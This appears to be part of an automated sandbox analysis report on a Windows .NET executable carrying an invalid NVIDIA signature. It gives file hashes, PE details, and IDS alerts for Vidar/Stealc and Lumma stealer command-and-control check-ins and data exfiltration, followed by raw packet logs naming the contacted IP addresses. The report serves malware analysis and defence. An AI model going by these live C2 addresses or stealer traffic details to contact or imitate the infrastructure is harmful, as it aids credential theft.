Preview:	\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|\|

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.466333558939044
Encrypted:	false
SSDEEP:	6144:bIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSb+:8XD94zWlLZMM6YFH8++
MD5:	C481A545381C9BAF872C4B446D2766FE
SHA1:	8AB660D55767B11D0484A655C8B8669DEBD3D581
SHA-256:	A0C95570CA8AB9A480C59874D5AC42AB76B9B8B553D529CD909A14162F672532
SHA-512:	27B09885602D76B2365F62E047BE6B4800F57BF1C6C8BC10E621FB003543CAEC6A92FF21833FFA32637BB4A18BFEDD494BFAF53D2A1A1898D9DA8E3AE9D7BBEA
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...F................................................................................................................................................................................................................................................................................................................................................Q..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\ProgramData\BKKKEGIDBG.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	0.9182958340544896
Encrypted:	false
SSDEEP:	3:a:a
MD5:	0C11BB317BD26E93C30821526C3834BD
SHA1:	70B99746FBF26B12B541D4C1A8451FD98B249BB2
SHA-256:	7393BA4F11E19A5F6BEE10ED995B0D959A52C4470855F6D68D4D1E34E26CB70F
SHA-512:	62AD6D1D2DABFFDBC800B416A01546C0337EC8B350112E6C09101D847D42BFBDE44C2B3949D3397FCC08BBF2800604FB5A700D71750DB24CF7E15D67AB07E726
Malicious:	false
Preview:	...

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989930362675489
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	423'328 bytes
MD5:	4ae2d1685d2732cfcd128560424c53cc
SHA1:	cfc1bb605838dae6c9f8cd73dd70df914c15c6d4
SHA256:	c13ea8341a801122bce40ae4d3d608728bf9c88404f3c315db88bd55c7316669
SHA512:	e96da30ce119d220a552f9fb5d25241643d902f391457b17d43c6d9fa98133f118d86f687413312133480b498339d126a3906d5f509bf384f11ee39ed8f30a58
SSDEEP:	12288:tMi7+OcVQP4lstjTN/Fzf3r0hNva1Jx8ZGHVABDFEO:tFtwYjTNtzDuN+gGHKft
TLSH:	8B94237F8D6CAC11C88A57303081F6203F61A3D0B6535ECA368FD532D79679393A55AA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..f............................^;... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x463b5e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66EED070 [Sat Sep 21 13:56:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 00:00:00 16/01/2026 23:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63b08	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x64f78	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x639d0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61b64	0x61c00	fe4cbff4f761da92448821fb343702e5	False	0.994914881713555	data	7.997020306823565	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5e0	0x600	ef30f3e05ced59f9a02af6774bf72e7e	False	0.4427083333333333	data	4.1561437801385885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	3c9e6b7cffb361e5b968861b5ad9f9e4	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x350	data			0.44693396226415094
RT_MANIFEST	0x643f0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-21T18:51:29.128437+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49740	116.203.165.127	443	TCP
2024-09-21T18:51:30.442551+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49741	116.203.165.127	443	TCP
2024-09-21T18:51:32.283449+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49742	116.203.165.127	443	TCP
2024-09-21T18:51:33.986937+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49743	116.203.165.127	443	TCP
2024-09-21T18:51:34.675371+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.165.127	443	192.168.2.4	49743	TCP
2024-09-21T18:51:35.428880+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49744	116.203.165.127	443	TCP
2024-09-21T18:51:36.121409+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49744	116.203.165.127	443	TCP
2024-09-21T18:51:36.121893+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.165.127	443	192.168.2.4	49744	TCP
2024-09-21T18:51:36.838083+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49745	116.203.165.127	443	TCP
2024-09-21T18:51:37.837266+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49746	116.203.165.127	443	TCP
2024-09-21T18:51:41.307984+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49747	116.203.165.127	443	TCP
2024-09-21T18:51:42.314354+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49748	116.203.165.127	443	TCP
2024-09-21T18:51:43.372650+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49749	116.203.165.127	443	TCP
2024-09-21T18:51:44.546351+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49750	116.203.165.127	443	TCP
2024-09-21T18:51:45.456965+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49751	116.203.165.127	443	TCP
2024-09-21T18:51:47.427196+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49752	116.203.165.127	443	TCP
2024-09-21T18:51:49.184473+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49753	116.203.165.127	443	TCP
2024-09-21T18:51:50.746428+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49754	116.203.165.127	443	TCP
2024-09-21T18:51:52.318966+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49755	116.203.165.127	443	TCP
2024-09-21T18:51:53.661994+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49756	116.203.165.127	443	TCP
2024-09-21T18:51:57.014191+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49757	116.203.165.127	443	TCP
2024-09-21T18:51:57.902338+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49758	116.203.165.127	443	TCP
2024-09-21T18:51:59.401701+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49759	116.203.165.127	443	TCP
2024-09-21T18:52:00.881617+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49761	116.203.165.127	443	TCP
2024-09-21T18:52:03.763591+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49762	116.203.165.127	443	TCP
2024-09-21T18:52:06.072019+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49763	116.203.165.127	443	TCP
2024-09-21T18:52:07.460539+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49764	147.45.44.104	80	TCP
2024-09-21T18:52:10.052319+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49765	116.203.165.127	443	TCP
2024-09-21T18:52:11.337181+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49766	104.21.9.6	443	TCP
2024-09-21T18:52:11.337181+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49766	104.21.9.6	443	TCP
2024-09-21T18:52:11.967550+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49767	116.203.165.127	443	TCP
2024-09-21T18:52:12.404016+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49768	188.114.96.3	443	TCP
2024-09-21T18:52:12.404016+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49768	188.114.96.3	443	TCP
2024-09-21T18:52:13.445284+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.4	49770	45.132.206.251	80	TCP
2024-09-21T18:52:13.445416+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49769	188.114.96.3	443	TCP
2024-09-21T18:52:13.445416+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49769	188.114.96.3	443	TCP
2024-09-21T18:52:14.454366+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49772	172.67.203.61	443	TCP
2024-09-21T18:52:14.454366+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49772	172.67.203.61	443	TCP
2024-09-21T18:52:15.362840+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49773	104.21.9.6	443	TCP
2024-09-21T18:52:15.362840+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49773	104.21.9.6	443	TCP
2024-09-21T18:52:15.990378+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49774	104.21.16.38	443	TCP
2024-09-21T18:52:15.990378+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49774	104.21.16.38	443	TCP
2024-09-21T18:52:17.165885+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49775	104.21.16.38	443	TCP
2024-09-21T18:52:17.165885+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49775	104.21.16.38	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2024 18:51:26.523430109 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:26.523498058 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:26.523577929 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:26.533768892 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:26.533812046 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:27.509418964 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:27.509529114 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:27.562139988 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:27.562187910 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:27.562654018 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:27.565464020 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:27.570096970 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:27.615441084 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.069009066 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.069076061 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.069174051 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.069271088 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.069271088 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.069271088 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.069299936 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.069344997 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.167860031 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.167934895 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.168011904 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.168023109 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.168035030 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.168054104 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.200752020 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.200810909 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.200949907 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.200963020 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.200963020 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.200999022 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.201306105 CEST	49739	443	192.168.2.4	92.122.104.90
Sep 21, 2024 18:51:28.201335907 CEST	443	49739	92.122.104.90	192.168.2.4
Sep 21, 2024 18:51:28.213752031 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:28.213795900 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:28.213895082 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:28.214148998 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:28.214165926 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.128334999 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.128437042 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.132879019 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.132891893 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.133289099 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.133374929 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.133840084 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.175426006 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.783596992 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.783679962 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.783696890 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.783761978 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.783772945 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.783823013 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.788181067 CEST	49740	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.788206100 CEST	443	49740	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.791361094 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.791410923 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:29.791501045 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.791766882 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:29.791785002 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:30.442471981 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:30.442550898 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:30.443032026 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:30.443041086 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:30.445071936 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:30.445080042 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:31.424691916 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:31.424823046 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:31.424838066 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:31.424875021 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:31.424890041 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:31.425050020 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:31.425440073 CEST	49741	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:31.425451994 CEST	443	49741	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:31.427540064 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:31.427563906 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:31.427648067 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:31.427980900 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:31.427994013 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:32.283262014 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:32.283448935 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:32.284204960 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:32.284224033 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:32.286510944 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:32.286523104 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.327011108 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.327068090 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.327107906 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.327124119 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.327138901 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.327181101 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.327219009 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.327271938 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.327348948 CEST	49742	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.327359915 CEST	443	49742	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.329128027 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.329168081 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.329262972 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.329473972 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.329482079 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.986763000 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.986937046 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.987515926 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.987529993 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 21, 2024 18:51:33.989595890 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 21, 2024 18:51:33.989603043 CEST	443	49743	116.203.165.127	192.168.2.4
